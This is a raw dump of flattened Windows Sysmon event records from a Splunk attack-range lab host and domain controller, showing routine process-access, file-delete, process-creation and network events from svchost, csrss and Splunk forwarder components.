10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216320Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216319Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216318Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216317Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1111-6216-4D04-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1111-6216-4D04-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.374{4F8D34B0-1111-6216-4D04-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:50.910{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=420BD198AE94BA92D43FFA4E83847119,SHA256=ACD47009BDAE24CFC0113F2AD9D88767592C8FD67D58CB6EC90188CD1064604E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:50.576{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DA687E36D549C9E23D64108FFA5DA75,SHA256=6F8B0952FBCE95C00401B996F5589755B269BB0300C7105180CC605E713EEC64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:50.482{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C21E7BE24D9BAC91029FC6A2CAB059A6,SHA256=E4C59F1005378050B644755AF5915F52C90C83BA56BD88C20234904A1D9CC866,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:50.139{4F8D34B0-1111-6216-4E04-000000003902}7762076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:51.925{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDAD5E99DADA9CE606C715B18E19219,SHA256=55880896302F8386F8AEE2A3D1141AA647751560D4252FC470CDD31AFD115EEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.642{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51318-false10.0.1.12-8000- 23542300x8000000000000000216358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.576{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=210E950CB062E7EC3F051F0B9EB915CC,SHA256=72925538CAC04BCD7AB3D21A45BEFAFD3C287F93157F7ABD8E3D1FE293819364,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1113-6216-4F04-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:51.513{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.D